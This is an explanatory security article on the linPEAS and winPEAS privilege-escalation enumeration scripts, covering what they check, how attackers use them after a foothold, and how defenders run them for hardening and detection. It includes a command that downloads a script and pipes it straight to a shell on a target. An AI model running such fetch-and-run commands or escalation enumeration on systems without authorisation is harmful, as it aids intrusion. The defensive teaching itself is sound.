linPEAS and winPEAS are open-source privilege-escalation enumeration scripts (part of the PEASS-ng project) that automatically check a Linux or Windows host for escalation paths, SUID binaries, sudo rules, capabilities, and writable files on Linux; privileges, services, and registry settings on Windows, and colour-highlight the most promising findings. They save an attacker hours of manual enumeration, and defenders run the same scripts to find and fix those paths first.
What linPEAS and winPEAS are
After gaining a foothold, the slow part of privilege escalation is enumeration: checking dozens of possible weak spots by hand. linPEAS (Linux) and winPEAS (Windows) automate that.
They run a large battery of checks and print the results, using colour to flag the highest-probability escalation paths. linPEAS looks at SUID/SGID binaries, sudo rules, capabilities, cron jobs, writable files, and credentials; winPEAS looks at token privileges, services, unquoted paths, AlwaysInstallElevated, and more.
How they are used and payload
The attacker uploads and runs the script, then reads the highlighted output:
- Linux:
curl -L https://.../linpeas.sh | shor transfer and run./linpeas.sh - Windows: run
winPEASx64.exeor the batch version on the target. - Findings flagged in red/yellow (for example a writable service, a dangerous capability, SeImpersonate enabled) point to the likely escalation.
The script does not exploit anything itself; it finds the path. The human confirms and exploits it. Shown for defensive context.
How defenders use them
- Run linPEAS/winPEAS on your own hosts during hardening and after changes, and remediate the highlighted findings.
- Treat red/yellow flags as a prioritised work list (writable services, dangerous privileges, SUID binaries).
- Combine with patching so kernel and software CVEs are covered too.
- Detect the scripts running on production hosts, since an attacker would use them.
- Re-run periodically, as configuration drift introduces new paths.